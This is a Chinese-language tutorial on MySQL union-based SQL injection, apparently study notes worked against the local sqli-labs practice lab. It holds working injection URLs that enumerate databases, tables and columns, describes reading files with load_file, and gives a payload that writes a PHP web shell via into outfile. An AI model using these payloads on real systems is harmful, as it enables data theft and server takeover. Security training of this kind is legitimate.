SQL注入：爆破库、表、字段

MySQL注入：

user（）函数判断注入的身份，在靶场中默认是root，在源码中：

因为高权限用户可以管理到更多的数据库和网站，比如本网站A注入的的是A数据库的root用户，而B网站连接的是B数据库的用户，那么甚至可以用A的root用户权限控制B数据库和网站（跨库注入）。
同时root用户有文件读写权限，普通用户没有，可以在mysql数据库的user表里查看权限。
database()查询的是当前网站对应的数据库，而其他网站对应的数据库自然查不到。比如sqlilab靶场只对应security数据库！因此需要查询information_schema的schemata表，那里边存放着所有mysql数据库的数据库名。

爆所有数据库名：

用group_concat（）函数拼接爆出所有，因为知道该数据库information_schema的数据表schemata的默认字段名：

127.0.0.1/sqli-labs-kali2-master/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

3.
爆指定数据库（security）下所有表名，需要where子句：

127.0.0.1/sqli-labs-kali2-master/Less-2/?id=-2%20union%20select%201,group_concat(table_name),database()%20from%20information_schema.tables%20where%20table_schema=database()--+

4.
爆指定数据库的指定表的字段（列）名数据（对于users表由于很多数据库都有故应该加个and子句限定指定数据库）：

127.0.0.1/sqli-labs-kali2-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' and table_schema = 'security'

5.
获取指定字段（列）的数据（group_concat函数必须将username与password字段都包括进去，否则会报错…当然也可以用where子句逐个列出）：

6.

文件读写操作：
load_file():读取函数
into outfile或into dumpfile:导出函数

load_file函数读取敏感文件或读取网站本身存在的敏感文件，如phpinfo。

写入函数：

获取路径的常见方法：
报错显示、遗留文件、漏洞报错、平台配置文件（常见的）、爆破（字典）、善于百度搜目标或软件（信息收集要全）等。

当魔术引号：magic_quotes_gpc = On时，输入数据中含单引号（’）、双引号（”）、反斜线（\）与 NULL（NULL 字符）等字符，都会被加上反斜线，被转义。同样原理的有addslashes（）函数。用类型判定函数来防御，比如is_int()函数，只允许输入数字！str_replace()函数替换等等。其实waf防护软件利用的就是这样的道理，涉及到关键字就会拦截住。

利用写入函数写入一句话实现getshell并读取：

127.0.0.1/sqli-labs-kali2-master/Less-2/?id=-1%20union%20select%201,2,%27%3C?php%20$_GET[%22shell%22];%20?%3E%27%20into%20outfile%20%27d:/123.php%27--+

127.0.0.1/sqli-labs-kali2-master/Less-2/?id=-1%20union%20select%201,load_file(%27d:/123.php%27),3--+